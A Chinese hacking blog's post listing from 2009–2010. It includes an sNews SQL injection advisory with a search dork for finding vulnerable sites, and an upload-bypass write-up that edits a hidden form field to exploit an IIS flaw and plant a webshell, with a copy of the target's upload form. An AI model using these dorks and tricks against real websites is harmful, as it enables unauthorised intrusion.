让discuz 7.0 论坛音乐自动播放
作者:王者星星 日期:2009-03-31
sNews (index.php) SQL 注入漏洞
作者:王者星星 日期:2010-07-25
发布日期:2010-07.25
发布作者:MajoR
官方地址:http://snews.awddesign.co.uk
漏洞描述: sNews (index.php) SQL 注入漏洞
DORK : "Powered by sNews " inurl:index.php?id=
[+] Vulnerable File :
SHOP363网店系统通杀漏洞
作者:王者星星 日期:2010-07-25
cmd下结束进程小记
作者:王者星星 日期:2010-04-21
linux学习笔记一
作者:王者星星 日期:2010-03-30
dos下echo导出文件数据追加的方法
作者:王者星星 日期:2010-03-08
上传漏洞hidden to text 突破手记
作者:王者星星 日期:2010-03-07
本文是由一个上传的页面突破上传引发的,话说当时群里议论纷纷。发出XXX网站的上传地址,研究过来研究过去。没找到突破,本地修改上传提交仍然不能突破。
就在当时,小三毛同志提出修改hidden to text利用IIS漏洞可取webshell。咱也试下这招数如何
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<LINK href="../css/css.css" rel=stylesheet type=text/css>
<title>上传图片</title>
</head>
<body leftmargin="0" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="20" align="center">
</td>
</tr>
</table>
<table width="90%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#999999">
<form action="http://xxx.net/inn/upfilesave.asp" method="post" enctype="multipart/form-data">


